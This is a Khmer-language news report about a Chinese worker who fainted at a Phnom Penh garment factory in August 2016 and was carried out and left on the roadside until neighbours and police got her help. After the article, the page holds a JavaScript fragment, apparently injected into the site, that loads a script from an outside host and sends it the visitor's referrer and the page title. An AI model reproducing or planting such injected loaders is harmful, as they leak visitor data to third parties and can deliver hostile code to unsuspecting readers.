ស្រ្តីជនជាតិចិនម្នាក់សន្លប់សង្ស័យមានជម្ងឺខ្យល់គ ត្រូវគេសែងចេញពីក្នុងរោងចក្រដាក់លើចញ្ចើមផ្លូវ

ភ្នំពេញ៖ ស្រ្តីជនជាតិចិនម្នាក់បានដួលសន្លប់ នៅក្នុងរោងចក្រកាត់ដេរមួយកន្លែងដែលគេសង្ស័យ ថាគាត់មានជម្ងឺខ្យល់គ និងត្រូវបានថៅកែរោងចក្រមួយនោះ បញ្ជាឲ្យសន្តិសុខនាំគ្នាសែងចេញក្រៅ និងដាក់ឲ្យដេកនៅលើចិញ្ចើមផ្លូវខាងមុខរោងចក្រនោះ និងត្រូវបានប្រជាពលរដ្ឋ ដែលមានលំនៅឋាន ក្បែរនោះនាំគ្នាជួយសង្គ្រោះបឋម ដោយការជួយធ្វើចលនាបេះដូង និងកោសខ្យល់ឲ្យមទើបគាត់មានស្ថានភាពធូរស្រាលបន្តិចវិញ ហើយកម្លាំងនគរបាលបានហៅរថយន្តពេទ្យដឹកយកទៅសង្គ្រោះបន្ទាន់។

ហេតុការណ៏នោះបានបង្កឲ្យមានការភ្ញាក់ផ្អើលឡើងកាលពីវេលាម៉ោង១២ថ្ងៃត្រង់ត្រង់ ថ្ងៃទី១០ ខែសីហា ឆ្នាំ២០១៦ នៅចំណុចមុខរោងចក្រកាត់ដេរ ជី អេវើហ្គ្រីន ដែលមានទីតាំងស្ថិតនៅក្នុងភូមិជ្រៃកោង សង្កាត់ចោមចៅមខណ្ឌពោធិ៍សែនជ័យ រាជធានីភ្នំពេញ៕
ឈ្មោះ ស៊ូ ឡុង អាយុ៤៣ឆ្នាំជាបុគ្គលិករោងចក្រកាត់ដេរខាងលើនោះ មិនបានដឹងថាគាត់ស្នាក់នៅ កន្លែងណាមួយនោះឡើយ បន្ទាប់មកត្រូវបានរថយន្តពេទ្យ របស់អង្គភាព៧១១ កងពលតូចលេខ៧០ នាំទៅកាន់មន្ទីរពេទ្យព្រះកុសុមៈ ដើម្បីសង្គ្រោះបន្ទាន់ភ្លាមៗដែរ។
តាមប្រភពព័ត៌មានបានឲ្យដឹងថា នៅមុនពេលកើតហេតុ ស្រ្តីជនជាតិចិនម្នាក់នោះរួមជាមួយប្ដី បានជិះរថយន្តមួយគ្រឿងចូលទៅក្នុងរោងចក្រកាត់ដេរមួយនោះ លុះក្រោយមកស្រាប់តែគាត់មានអាការៈ មិនស្រួលខ្លួន ដួលសន្លប់នៅក្នុងរោងចក្រ ហើយដោយសារខ្លាចគាត់ស្លាប់នៅក្នុងរោងចក្រ ទើបថៅកែរោងចក្របឋនបញ្ជាឲ្យ ក្រុមសន្តិសុខនំគ្នាសែងចេញក្រៅ ទៅដាក់ចោលនៅក្រោមដើមក្រខុប ខាងមុខរោងចក្រ ។ពេលនោះត្រូវបានប្រជាពលរដ្ឋ នាំគ្នាជួយសង្គ្រោះបឋម កោសខ្យល់មិងធ្វើចលនាបេះ ដូងឲ្យរួចបានរាយការណ៏ជូននគរបាលឲ្យចុះទៅពិនិត្យមើល ព្រមទាំងហៅរថយន្តសង្គ្រោះដឹកទៅកាន់មន្ទីរពេទ្យតែម្ដង៕

a9a38871-1e2a-4649-a7ba-15068d5f0840s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More